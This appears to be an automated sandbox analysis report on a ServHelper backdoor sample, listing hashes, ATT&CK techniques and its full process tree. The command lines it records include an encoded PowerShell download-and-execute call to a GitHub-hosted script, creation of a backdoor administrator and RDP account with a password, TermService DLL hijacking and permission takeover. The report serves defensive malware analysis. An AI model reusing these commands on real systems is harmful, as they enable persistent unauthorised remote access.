servhelper | be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c

Analysis

max time kernel
140s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04-12-2024 00:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe
Size

5.9MB
MD5

bfe0ac25eeeb759f7c8e06229c7313a2
SHA1

199c1fbd29f9ec98b83464763dac63ef80998bb3
SHA256

be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
SHA512

a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72
SSDEEP

49152:tvGIuxrb/TkvO90dL3BmAFd4A64nsfJ1XU59mMJETIR1iVhYOxbJBKqKhmYYMNn9:tvGfXdmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Servhelper family
servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
2688	net1.exe
2508	cmd.exe
1916	net.exe
2172	net1.exe
1944	cmd.exe
1848	net.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	2604	powershell.exe
8	2604	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
1060	cmd.exe
1868	net.exe
1520	net1.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
2408	icacls.exe
2516	icacls.exe
2244	icacls.exe
2080	icacls.exe
2512	takeown.exe
1664	icacls.exe
2748	icacls.exe
2896	icacls.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

pid	Process
1668	Process not Found
1668	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2896	icacls.exe
2408	icacls.exe
2516	icacls.exe
2244	icacls.exe
2080	icacls.exe
2512	takeown.exe
1664	icacls.exe
2748	icacls.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0008000000019284-78.dat	upx
behavioral1/files/0x0008000000019356-79.dat	upx

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F7SX0F7HS06YX6SY9B3P.temp	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1264	powershell.exe
1652	powershell.exe
1532	powershell.exe
2604	powershell.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1576	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30ee0f15e045db01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3016	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2640	powershell.exe
1264	powershell.exe
1652	powershell.exe
1532	powershell.exe
2640	powershell.exe
2640	powershell.exe
2640	powershell.exe
2604	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
476	Process not Found
1668	Process not Found
1668	Process not Found
1668	Process not Found
1668	Process not Found
1668	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	816	bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeRestorePrivilege	2748	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1576	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1576	WMIC.exe
Token: SeAuditPrivilege	1576	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1576	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1576	WMIC.exe
Token: SeAuditPrivilege	1576	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2308	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2308	WMIC.exe
Token: SeAuditPrivilege	2308	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2308	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2308	WMIC.exe
Token: SeAuditPrivilege	2308	WMIC.exe
Token: SeDebugPrivilege	2604	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 816 wrote to memory of 2640	816	bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe	32
PID 816 wrote to memory of 2640	816	bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe	32
PID 816 wrote to memory of 2640	816	bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe	32
PID 2640 wrote to memory of 2352	2640	powershell.exe	34
PID 2640 wrote to memory of 2352	2640	powershell.exe	34
PID 2640 wrote to memory of 2352	2640	powershell.exe	34
PID 2352 wrote to memory of 2584	2352	csc.exe	35
PID 2352 wrote to memory of 2584	2352	csc.exe	35
PID 2352 wrote to memory of 2584	2352	csc.exe	35
PID 2640 wrote to memory of 1264	2640	powershell.exe	36
PID 2640 wrote to memory of 1264	2640	powershell.exe	36
PID 2640 wrote to memory of 1264	2640	powershell.exe	36
PID 2640 wrote to memory of 1652	2640	powershell.exe	38
PID 2640 wrote to memory of 1652	2640	powershell.exe	38
PID 2640 wrote to memory of 1652	2640	powershell.exe	38
PID 2640 wrote to memory of 1532	2640	powershell.exe	40
PID 2640 wrote to memory of 1532	2640	powershell.exe	40
PID 2640 wrote to memory of 1532	2640	powershell.exe	40
PID 2640 wrote to memory of 2512	2640	powershell.exe	42
PID 2640 wrote to memory of 2512	2640	powershell.exe	42
PID 2640 wrote to memory of 2512	2640	powershell.exe	42
PID 2640 wrote to memory of 1664	2640	powershell.exe	43
PID 2640 wrote to memory of 1664	2640	powershell.exe	43
PID 2640 wrote to memory of 1664	2640	powershell.exe	43
PID 2640 wrote to memory of 2748	2640	powershell.exe	44
PID 2640 wrote to memory of 2748	2640	powershell.exe	44
PID 2640 wrote to memory of 2748	2640	powershell.exe	44
PID 2640 wrote to memory of 2896	2640	powershell.exe	45
PID 2640 wrote to memory of 2896	2640	powershell.exe	45
PID 2640 wrote to memory of 2896	2640	powershell.exe	45
PID 2640 wrote to memory of 2408	2640	powershell.exe	46
PID 2640 wrote to memory of 2408	2640	powershell.exe	46
PID 2640 wrote to memory of 2408	2640	powershell.exe	46
PID 2640 wrote to memory of 2516	2640	powershell.exe	47
PID 2640 wrote to memory of 2516	2640	powershell.exe	47
PID 2640 wrote to memory of 2516	2640	powershell.exe	47
PID 2640 wrote to memory of 2244	2640	powershell.exe	48
PID 2640 wrote to memory of 2244	2640	powershell.exe	48
PID 2640 wrote to memory of 2244	2640	powershell.exe	48
PID 2640 wrote to memory of 2080	2640	powershell.exe	49
PID 2640 wrote to memory of 2080	2640	powershell.exe	49
PID 2640 wrote to memory of 2080	2640	powershell.exe	49
PID 2640 wrote to memory of 2152	2640	powershell.exe	50
PID 2640 wrote to memory of 2152	2640	powershell.exe	50
PID 2640 wrote to memory of 2152	2640	powershell.exe	50
PID 2640 wrote to memory of 3016	2640	powershell.exe	51
PID 2640 wrote to memory of 3016	2640	powershell.exe	51
PID 2640 wrote to memory of 3016	2640	powershell.exe	51
PID 2640 wrote to memory of 2148	2640	powershell.exe	52
PID 2640 wrote to memory of 2148	2640	powershell.exe	52
PID 2640 wrote to memory of 2148	2640	powershell.exe	52
PID 2640 wrote to memory of 2236	2640	powershell.exe	53
PID 2640 wrote to memory of 2236	2640	powershell.exe	53
PID 2640 wrote to memory of 2236	2640	powershell.exe	53
PID 2236 wrote to memory of 3044	2236	net.exe	54
PID 2236 wrote to memory of 3044	2236	net.exe	54
PID 2236 wrote to memory of 3044	2236	net.exe	54
PID 2640 wrote to memory of 408	2640	powershell.exe	55
PID 2640 wrote to memory of 408	2640	powershell.exe	55
PID 2640 wrote to memory of 408	2640	powershell.exe	55
PID 408 wrote to memory of 1136	408	cmd.exe	56
PID 408 wrote to memory of 1136	408	cmd.exe	56
PID 408 wrote to memory of 1136	408	cmd.exe	56
PID 1136 wrote to memory of 1656	1136	cmd.exe	57

C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2_JaffaCakes118.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:816
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2640
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tezzw6ri.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2352
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF27.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFF26.tmp"
      4⤵
      PID:2584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1532
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2512
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1664
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2896
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2408
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2516
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2244
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2080
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2152
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Server Software Component: Terminal Services DLL
    - Modifies registry key
    PID:3016
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2148
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2236
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3044
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:408
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1136
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:1656
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2188
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:2492
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:700
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:904
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:860
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1396
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1056

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Indicator Removal: Network Share Connection Removal
PID:1060
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
  PID:1868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:1520

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc gv4b4wAF /add
1⤵
PID:1648
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc gv4b4wAF /add
  2⤵
  PID:1744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc gv4b4wAF /add
    3⤵
    PID:1328

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1944
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:1848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2688

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" ZQABOPWE$ /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2508
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" ZQABOPWE$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:1916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" ZQABOPWE$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2172

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2208
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:1636

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc gv4b4wAF
1⤵
PID:1448
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc gv4b4wAF
  2⤵
  PID:892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc gv4b4wAF
    3⤵
    PID:1892

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1876
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1576

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2844
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2308

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2588
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESFF27.tmp

Filesize
1KB

MD5
ad97903ac5ed704dcf33d0a7b8d19a72

SHA1
3173fc96645bad5098b40469c9d31aa3e3d31360

SHA256
61153665de93dd43acf368a7f7a4cb2e82919ebea1ac9fefa60bb23a482a752e

SHA512
23953948ffbb9841a63fc00f5b287b881da6075de2cbd6918be5c52e865a4e9fb61c1cd0d9f09c1acc6e36391b374a05d942a41e0bacd4aaac9f307e8b463c04

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
6938a2a0fa3adc1ab9cc3bb479ff0e74

SHA1
37e2117cf83cdf1a631a394ce6f0c57f70ee3f47

SHA256
df16833eb7975ca070466bf2f655e078508a59968d8f50f14a8ff7873008d068

SHA512
5509bae8342bfc482a671258fe3012247f89b2449e84f6c42a4dd0bc73cd4177fff6d581c3615214fc0b5f115a77e24213c5dd37f8c0631eb9064349c33eec79

Download Submit
C:\Users\Admin\AppData\Local\Temp\tezzw6ri.dll

Filesize
3KB

MD5
653c34e0ac26e2de06e2f4cdbdcee4df

SHA1
3141ef78875f3f44610df6a0599d1a5b4b6c5961

SHA256
c5dfa2f2d746315d79fd5dfd2069cf066abf3c5ba9dcbe4e8a3d1ed366a453e7

SHA512
0a408f40519cc373c31e17eeca0cf3ee0f133f6d1abfc438d04ec60b79f1bce01973c8b78a3556d92209ea4848f67bb96d3f88c516552d866a11d9ebb7630fd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\tezzw6ri.pdb

Filesize
7KB

MD5
2be332861c69af7f8af96c3852139de3

SHA1
3ef805a951c0d4e85b476d9807c86cd8de08ff1f

SHA256
a86d9acb4f222cfe8324b2cc4d8ace222b704f927bb0326aac49304ae2f8948c

SHA512
adaddb917e34470fc57f3e9c52c63fc5480650e0f4bb492d1ec24a8dfc4fc29a0a70c77ed35873479d6473f8541555ecc30416723a9ac3dd39fd36eb00fbc276

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
4afdd7530df49067628bb20700315d73

SHA1
6d7255c588e24eb41f52255008719ce2daa1d642

SHA256
4d3fe2c6d7415fd701f69bcfa6721155da16e77d5624facd4425857d8b99c298

SHA512
a16327711864073b7f871c3f773d74908ad48a1eec0e907eafedcba69697b6dfe53f1beb84b255b0c34f96519f396de0fbd0c8ea39edebd46aad502eb126de17

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCFF26.tmp

Filesize
652B

MD5
15a013c3713c994ca1d1aa75d0f8f199

SHA1
045f0c96cdbbd99ffd1ef717409867c80767f17a

SHA256
3e5cf03087df4e4c63cb5245e56e7e322dd04a25e86f746639f1fd2bb471de92

SHA512
444d49d6b52461d67e38b9ffd995f0034cacc972fff7595f75959c50b914dc77056408a4de373ce52f902097e4f1c7cf4bf1975209f5b1690dbb134f6df4ad34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tezzw6ri.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tezzw6ri.cmdline

Filesize
309B

MD5
bc775f34e51160a85c4a6ca0ef19ad71

SHA1
21c6f6bdc7ba5af457f85f8a470dc60db6ab7b64

SHA256
47754488babc538e00702ddfe7cc2200df7f0c961a6cb2a743e86e1ed3ae5e7a

SHA512
fb22bd6f1e926c14cee015f627fde284df9c42b82dee55a7c03a5a1403800f7bb035c883ffce2751132380d23b0e9496be34102057b2378d4bb1586ff5b1f489

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
70d1bf1c7a95f0613358ac07bc3864ad

SHA1
52783a6ace472471ad68b602c604e48340737596

SHA256
88e639c34e7798f2e51a121db7e0dedc7c5f4bfa95963bb5c93bcb221e0127c3

SHA512
ed5e46ee00e735ca09c5cf4dfed311a4229ff08e9d626c1afa2ed6cc7543f8808259f9553666844ebf25d775b20af0a9bafe59c3b525a6918db1e8c7f70e4fb5

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
58b4c6a70f55d70a401015da300261b2

SHA1
a13b8a1a577c3638c311f5e668b61cea8a532d35

SHA256
9eaa1a087f7aaa768134c540941584fdc2cd8d050b375a36ded9d1cdf7fb7fe0

SHA512
0ae4aaf9f6383b752b824f86e9ae10983e9f00df9868efa3a1c5e1f2bfae062e43458260c7a379b7d6f711f4ef6a6f22035cc4cd21d7ba1b3c7a5e10f8f06289

Download Submit
memory/816-51-0x000007FEF4E10000-0x000007FEF57FC000-memory.dmp

Filesize
9.9MB

Download
